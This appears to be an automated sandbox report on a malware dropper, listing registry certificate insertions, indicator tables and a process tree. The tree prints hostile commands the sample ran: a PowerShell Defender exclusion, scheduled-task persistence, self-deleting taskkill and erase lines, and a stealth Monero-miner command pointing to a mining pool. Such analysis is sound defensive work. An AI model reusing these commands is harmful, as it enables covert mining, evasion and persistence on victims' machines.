4032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Mon1547d11c23777f6e7.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Mon1590e659d520c442.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Mon1590e659d520c442.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Mon1547d11c23777f6e7.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Mon1547d11c23777f6e7.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	58	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
340	Process not Found
340	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1072	powershell.exe
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
2384	WerFault.exe
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1200	Process not Found
2384	WerFault.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
340	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
2864	3824269.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1836	Mon1590e659d520c442.exe
Token: SeAssignPrimaryTokenPrivilege	1836	Mon1590e659d520c442.exe
Token: SeLockMemoryPrivilege	1836	Mon1590e659d520c442.exe
Token: SeIncreaseQuotaPrivilege	1836	Mon1590e659d520c442.exe
Token: SeMachineAccountPrivilege	1836	Mon1590e659d520c442.exe
Token: SeTcbPrivilege	1836	Mon1590e659d520c442.exe
Token: SeSecurityPrivilege	1836	Mon1590e659d520c442.exe
Token: SeTakeOwnershipPrivilege	1836	Mon1590e659d520c442.exe
Token: SeLoadDriverPrivilege	1836	Mon1590e659d520c442.exe
Token: SeSystemProfilePrivilege	1836	Mon1590e659d520c442.exe
Token: SeSystemtimePrivilege	1836	Mon1590e659d520c442.exe
Token: SeProfSingleProcessPrivilege	1836	Mon1590e659d520c442.exe
Token: SeIncBasePriorityPrivilege	1836	Mon1590e659d520c442.exe
Token: SeCreatePagefilePrivilege	1836	Mon1590e659d520c442.exe
Token: SeCreatePermanentPrivilege	1836	Mon1590e659d520c442.exe
Token: SeBackupPrivilege	1836	Mon1590e659d520c442.exe
Token: SeRestorePrivilege	1836	Mon1590e659d520c442.exe
Token: SeShutdownPrivilege	1836	Mon1590e659d520c442.exe
Token: SeDebugPrivilege	1836	Mon1590e659d520c442.exe
Token: SeAuditPrivilege	1836	Mon1590e659d520c442.exe
Token: SeSystemEnvironmentPrivilege	1836	Mon1590e659d520c442.exe
Token: SeChangeNotifyPrivilege	1836	Mon1590e659d520c442.exe
Token: SeRemoteShutdownPrivilege	1836	Mon1590e659d520c442.exe
Token: SeUndockPrivilege	1836	Mon1590e659d520c442.exe
Token: SeSyncAgentPrivilege	1836	Mon1590e659d520c442.exe
Token: SeEnableDelegationPrivilege	1836	Mon1590e659d520c442.exe
Token: SeManageVolumePrivilege	1836	Mon1590e659d520c442.exe
Token: SeImpersonatePrivilege	1836	Mon1590e659d520c442.exe
Token: SeCreateGlobalPrivilege	1836	Mon1590e659d520c442.exe
Token: 31	1836	Mon1590e659d520c442.exe
Token: 32	1836	Mon1590e659d520c442.exe
Token: 33	1836	Mon1590e659d520c442.exe
Token: 34	1836	Mon1590e659d520c442.exe
Token: 35	1836	Mon1590e659d520c442.exe
Token: SeDebugPrivilege	536	Mon159345e4f6bd10e49.exe
Token: SeDebugPrivilege	920	Mon15a53317618120.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeDebugPrivilege	2384	WerFault.exe
Token: SeDebugPrivilege	2432	taskkill.exe
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeDebugPrivilege	2672	2.exe
Token: SeDebugPrivilege	2648	PublicDwlBrowser1100.exe
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeDebugPrivilege	2892	3632470.exe
Token: SeDebugPrivilege	1480	taskkill.exe
Token: SeDebugPrivilege	3012	BearVpn 3.exe
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeDebugPrivilege	328	4978679.exe
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeShutdownPrivilege	1200	Process not Found
Token: SeDebugPrivilege	2664	postback.exe
Token: SeDebugPrivilege	3000	3812442.exe
Token: SeDebugPrivilege	2756	5528473.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
2328	setup_2.tmp
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found
1200	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1664 wrote to memory of 1748	1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe	26
PID 1664 wrote to memory of 1748	1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe	26
PID 1664 wrote to memory of 1748	1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe	26
PID 1664 wrote to memory of 1748	1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe	26
PID 1664 wrote to memory of 1748	1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe	26
PID 1664 wrote to memory of 1748	1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe	26
PID 1664 wrote to memory of 1748	1664	446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe	26
PID 1748 wrote to memory of 1624	1748	setup_install.exe	28
PID 1748 wrote to memory of 1624	1748	setup_install.exe	28
PID 1748 wrote to memory of 1624	1748	setup_install.exe	28
PID 1748 wrote to memory of 1624	1748	setup_install.exe	28
PID 1748 wrote to memory of 1624	1748	setup_install.exe	28
PID 1748 wrote to memory of 1624	1748	setup_install.exe	28
PID 1748 wrote to memory of 1624	1748	setup_install.exe	28
PID 1748 wrote to memory of 1636	1748	setup_install.exe	29
PID 1748 wrote to memory of 1636	1748	setup_install.exe	29
PID 1748 wrote to memory of 1636	1748	setup_install.exe	29
PID 1748 wrote to memory of 1636	1748	setup_install.exe	29
PID 1748 wrote to memory of 1636	1748	setup_install.exe	29
PID 1748 wrote to memory of 1636	1748	setup_install.exe	29
PID 1748 wrote to memory of 1636	1748	setup_install.exe	29
PID 1748 wrote to memory of 292	1748	setup_install.exe	30
PID 1748 wrote to memory of 292	1748	setup_install.exe	30
PID 1748 wrote to memory of 292	1748	setup_install.exe	30
PID 1748 wrote to memory of 292	1748	setup_install.exe	30
PID 1748 wrote to memory of 292	1748	setup_install.exe	30
PID 1748 wrote to memory of 292	1748	setup_install.exe	30
PID 1748 wrote to memory of 292	1748	setup_install.exe	30
PID 1748 wrote to memory of 1464	1748	setup_install.exe	36
PID 1748 wrote to memory of 1464	1748	setup_install.exe	36
PID 1748 wrote to memory of 1464	1748	setup_install.exe	36
PID 1748 wrote to memory of 1464	1748	setup_install.exe	36
PID 1748 wrote to memory of 1464	1748	setup_install.exe	36
PID 1748 wrote to memory of 1464	1748	setup_install.exe	36
PID 1748 wrote to memory of 1464	1748	setup_install.exe	36
PID 1748 wrote to memory of 604	1748	setup_install.exe	35
PID 1748 wrote to memory of 604	1748	setup_install.exe	35
PID 1748 wrote to memory of 604	1748	setup_install.exe	35
PID 1748 wrote to memory of 604	1748	setup_install.exe	35
PID 1748 wrote to memory of 604	1748	setup_install.exe	35
PID 1748 wrote to memory of 604	1748	setup_install.exe	35
PID 1748 wrote to memory of 604	1748	setup_install.exe	35
PID 1636 wrote to memory of 340	1636	cmd.exe	31
PID 1636 wrote to memory of 340	1636	cmd.exe	31
PID 1636 wrote to memory of 340	1636	cmd.exe	31
PID 1636 wrote to memory of 340	1636	cmd.exe	31
PID 1636 wrote to memory of 340	1636	cmd.exe	31
PID 1636 wrote to memory of 340	1636	cmd.exe	31
PID 1636 wrote to memory of 340	1636	cmd.exe	31
PID 1624 wrote to memory of 1072	1624	cmd.exe	34
PID 1624 wrote to memory of 1072	1624	cmd.exe	34
PID 1624 wrote to memory of 1072	1624	cmd.exe	34
PID 1624 wrote to memory of 1072	1624	cmd.exe	34
PID 1624 wrote to memory of 1072	1624	cmd.exe	34
PID 1624 wrote to memory of 1072	1624	cmd.exe	34
PID 1624 wrote to memory of 1072	1624	cmd.exe	34
PID 1748 wrote to memory of 452	1748	setup_install.exe	33
PID 1748 wrote to memory of 452	1748	setup_install.exe	33
PID 1748 wrote to memory of 452	1748	setup_install.exe	33
PID 1748 wrote to memory of 452	1748	setup_install.exe	33
PID 1748 wrote to memory of 452	1748	setup_install.exe	33
PID 1748 wrote to memory of 452	1748	setup_install.exe	33
PID 1748 wrote to memory of 452	1748	setup_install.exe	33
PID 1748 wrote to memory of 1524	1748	setup_install.exe	32

C:\Users\Admin\AppData\Local\Temp\446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe
"C:\Users\Admin\AppData\Local\Temp\446f021fd7d29650c1c5dc596bcb48d9662c624249840e847c316f7e775da766.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Users\Admin\AppData\Local\Temp\7zS08619B14\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS08619B14\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1624
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon15818fcb352.exe
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\7zS08619B14\Mon15818fcb352.exe
      Mon15818fcb352.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon151a01e1ddefea03.exe
    3⤵
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon15a53317618120.exe
    3⤵
    - Loads dropped DLL
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\7zS08619B14\Mon15a53317618120.exe
      Mon15a53317618120.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:920
    - - C:\Users\Admin\AppData\Roaming\3632470.exe
        
        "C:\Users\Admin\AppData\Roaming\3632470.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2892
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2892 -s 1748
        6⤵
        Program crash
        
        PID:2204
    - - C:\Users\Admin\AppData\Roaming\3368312.exe
        
        "C:\Users\Admin\AppData\Roaming\3368312.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2368
      - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        6⤵
        Executes dropped EXE
        
        PID:1420
    - - C:\Users\Admin\AppData\Roaming\7313104.exe
        
        "C:\Users\Admin\AppData\Roaming\7313104.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2960
    - - C:\Users\Admin\AppData\Roaming\3684306.exe
        
        "C:\Users\Admin\AppData\Roaming\3684306.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1820
    - - C:\Users\Admin\AppData\Roaming\3812442.exe
        
        "C:\Users\Admin\AppData\Roaming\3812442.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3000
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 1800
        6⤵
        Program crash
        
        PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon1547d11c23777f6e7.exe
    3⤵
    - Loads dropped DLL
    PID:452
  - - C:\Users\Admin\AppData\Local\Temp\7zS08619B14\Mon1547d11c23777f6e7.exe
      Mon1547d11c23777f6e7.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      PID:1404
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1404 -s 1000
        5⤵
        Loads dropped DLL
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon1543669f69f247e.exe
    3⤵
    - Loads dropped DLL
    PID:604
  - - C:\Users\Admin\AppData\Local\Temp\7zS08619B14\Mon1543669f69f247e.exe
      Mon1543669f69f247e.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon15f819eb2300d8eae.exe /mixone
    3⤵
    - Loads dropped DLL
    PID:1464
  - - C:\Users\Admin\AppData\Local\Temp\7zS08619B14\Mon15f819eb2300d8eae.exe
      Mon15f819eb2300d8eae.exe /mixone
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1820
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Mon15f819eb2300d8eae.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS08619B14\Mon15f819eb2300d8eae.exe" & exit
        5⤵
        
        PID:2552
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Mon15f819eb2300d8eae.exe" /f
        6⤵
        Kills process with taskkill
        
        PID:2596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon159345e4f6bd10e49.exe
    3⤵
    - Loads dropped DLL
    PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\7zS08619B14\Mon159345e4f6bd10e49.exe
      Mon159345e4f6bd10e49.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:536
    - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2492
      - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        6⤵
        Executes dropped EXE
        
        PID:2608
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        7⤵
        
        PID:2396
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        8⤵
        Creates scheduled task(s)
        
        PID:2224
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2092
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:912
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:1520
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        8⤵
        Executes dropped EXE
        
        PID:2348
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        8⤵
        
        PID:2076
      - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
        
        C:\Users\Admin\AppData\Roaming\4978679.exe
        
        "C:\Users\Admin\AppData\Roaming\4978679.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:328
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 328 -s 1788
        8⤵
        Program crash
        
        PID:2064
        
        C:\Users\Admin\AppData\Roaming\3824269.exe
        
        "C:\Users\Admin\AppData\Roaming\3824269.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:2864
        
        C:\Users\Admin\AppData\Roaming\5792630.exe
        
        "C:\Users\Admin\AppData\Roaming\5792630.exe"
        7⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2988
        
        C:\Users\Admin\AppData\Roaming\5528473.exe
        
        "C:\Users\Admin\AppData\Roaming\5528473.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 1796
        8⤵
        Program crash
        
        PID:1616
      - C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        7⤵
        Executes dropped EXE
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1500
      - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2720
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        7⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1480
      - C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2792
      - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\is-T1K1V.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-T1K1V.tmp\setup_2.tmp" /SL5="$2018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:2916
        
